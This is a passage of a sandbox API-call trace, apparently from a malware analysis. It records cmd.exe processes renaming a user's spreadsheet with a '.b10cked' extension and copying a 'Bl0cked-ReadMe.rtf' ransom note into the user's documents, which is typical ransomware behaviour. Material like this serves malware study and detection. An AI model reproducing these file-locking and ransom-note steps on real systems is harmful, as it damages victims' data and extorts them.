_wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.720] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.720] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.720] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.720] 
_wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.720] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.720] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.720] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.720] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.720] GetEnvironmentStringsW () returned 0x362328* [0131.720] FreeEnvironmentStringsW (penv=0x362328) returned 1 [0131.720] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.720] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.720] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.720] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.720] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.720] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.720] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.720] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.721] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.721] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.721] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f918 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.721] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f918, lpFilePart=0x26f914 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f914*="Desktop") returned 0x18 [0131.721] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.721] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f694 | out: lpFindFileData=0x26f694) returned 0x360068 [0131.721] FindClose (in: hFindFile=0x360068 | 
out: hFindFile=0x360068) returned 1 [0131.721] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f694 | out: lpFindFileData=0x26f694) returned 0x360068 [0131.721] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0131.721] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f694 | out: lpFindFileData=0x26f694) returned 0x360068 [0131.722] FindClose (in: hFindFile=0x360068 | out: hFindFile=0x360068) returned 1 [0131.722] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.722] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0131.722] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0131.722] GetEnvironmentStringsW () returned 0x362b48* [0131.722] FreeEnvironmentStringsW (penv=0x362b48) returned 1 [0131.722] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.723] GetConsoleOutputCP () returned 0x1b5 [0131.723] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.723] GetUserDefaultLCID () returned 0x409 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26fa58, cchData=128 | out: lpLCData="0") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26fa58, cchData=128 | out: lpLCData="0") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26fa58, cchData=128 | out: lpLCData="1") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0131.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | 
out: lpLCData="Mon") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0131.724] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0131.724] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.725] GetConsoleTitleW (in: lpConsoleTitle=0x350918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.725] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.725] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0131.725] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0131.725] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0131.726] _wcsicmp (_String1="move", _String2=")") returned 68 [0131.726] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0131.726] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0131.726] _wcsicmp (_String1="IF", _String2="move") returned -4 [0131.726] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0131.726] _wcsicmp (_String1="REM", 
_String2="move") returned 5 [0131.726] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0131.730] GetConsoleTitleW (in: lpConsoleTitle=0x26f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.730] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0131.730] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0131.730] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0131.730] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0131.730] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0131.730] _wcsicmp (_String1="move", _String2="CD") returned 10 [0131.730] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0131.730] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="REN") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0131.730] _wcsicmp (_String1="move", _String2="SET") returned -6 [0131.730] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0131.730] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0131.730] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0131.730] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0131.730] _wcsicmp (_String1="move", _String2="MD") returned 11 [0131.730] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0131.730] _wcsicmp (_String1="move", _String2="RD") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0131.730] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0131.730] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0131.730] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0131.731] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0131.731] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0131.731] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0131.731] _wcsicmp (_String1="move", _String2="VER") returned -9 [0131.731] _wcsicmp 
(_String1="move", _String2="VOL") returned -9 [0131.731] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0131.731] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0131.731] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0131.731] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0131.731] _wcsicmp (_String1="move", _String2="START") returned -6 [0131.731] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0131.731] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0131.731] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0131.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.732] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.732] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f50c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f504, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f504*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", 
_MaxCount=0x7) returned -9 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.733] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) 
returned -20 [0131.734] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2=".") returned 7 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2="..") returned 7 [0131.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5ddjxd~1.xls")) returned 0x20 [0131.734] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361ed0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.734] SetErrorMode (uMode=0x0) returned 0x0 [0131.734] SetErrorMode (uMode=0x1) returned 0x0 [0131.734] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", nBufferLength=0x104, lpBuffer=0x26ee94, lpFilePart=0x26ee7c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", lpFilePart=0x26ee7c*="5DDJXD~1.XLS") returned 0x36 [0131.734] SetErrorMode (uMode=0x0) returned 0x1 [0131.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x10 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2=".") returned 7 [0131.734] _wcsicmp (_String1="5DDJXD~1.XLS", _String2="..") returned 7 [0131.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5ddjxd~1.xls")) returned 0x20 [0131.735] SetErrorMode (uMode=0x0) returned 0x0 [0131.735] SetErrorMode (uMode=0x1) returned 0x0 [0131.735] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", nBufferLength=0x104, lpBuffer=0x26f310, lpFilePart=0x26f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", lpFilePart=0x26f0a8*="5DDJXD~1.XLS") returned 0x36 [0131.735] SetErrorMode (uMode=0x0) returned 0x1 [0131.735] SetErrorMode 
(uMode=0x0) returned 0x0 [0131.735] SetErrorMode (uMode=0x1) returned 0x0 [0131.735] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", nBufferLength=0x104, lpBuffer=0x26f518, lpFilePart=0x26f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", lpFilePart=0x26f0a8*="5d djXdWwSLPL XJ.xls.b10cked") returned 0x46 [0131.735] SetErrorMode (uMode=0x0) returned 0x1 [0131.735] SetLastError (dwErrCode=0x0) [0131.735] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls.b10cked")) returned 0xffffffff [0131.735] GetLastError () returned 0x2 [0131.735] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x26ea24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ea24) returned 0x350f50 [0131.910] FindNextFileW (in: hFindFile=0x350f50, lpFindFileData=0x26ea24 | out: lpFindFileData=0x26ea24) returned 0 [0131.911] GetLastError () returned 0x12 [0131.911] FindClose (in: hFindFile=0x350f50 | out: hFindFile=0x350f50) returned 1 [0131.912] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5DDJXD~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x361c70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361c70) returned 0x350f50 [0131.912] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", nBufferLength=0x104, lpBuffer=0x26ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked", lpFilePart=0x0) returned 0x46 [0131.912] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls", nBufferLength=0x104, 
lpBuffer=0x26ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls", lpFilePart=0x0) returned 0x3e [0131.912] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls")) returned 0x20 [0131.912] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\5d djXdWwSLPL XJ.xls.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\5d djxdwwslpl xj.xls.b10cked"), dwFlags=0x3) returned 1 [0131.913] FindClose (in: hFindFile=0x350f50 | out: hFindFile=0x350f50) returned 1 [0131.913] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ec70 | out: _Buffer=" 1") returned 9 [0131.913] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.913] GetFileType (hFile=0x7) returned 0x2 [0131.913] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0131.913] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ebfc | out: lpMode=0x26ebfc) returned 1 [0131.913] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26ec30 | out: lpConsoleScreenBufferInfo=0x26ec30) returned 1 [0131.913] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0131.914] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26ec70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0131.914] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x26ec54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26ec54*=0x1a) returned 1 [0131.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.914] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.914] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.914] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.914] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.914] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.915] SetConsoleInputExeNameW () returned 0x1 [0131.915] GetConsoleOutputCP () returned 0x1b5 [0131.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.915] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.915] exit (_Code=0) Process: id = "110" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12059 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12060 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12061 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12062 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12063 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12064 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12065 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12066 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12067 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 12068 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12147 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12148 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12149 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 
(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12150 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 12151 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 12152 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12153 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12154 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12155 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12156 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12157 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12158 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12159 start_va = 0x773e0000 end_va = 
0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12160 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12161 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12162 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12163 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12164 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 12165 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 12166 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12167 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 12168 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 12169 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 12170 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" 
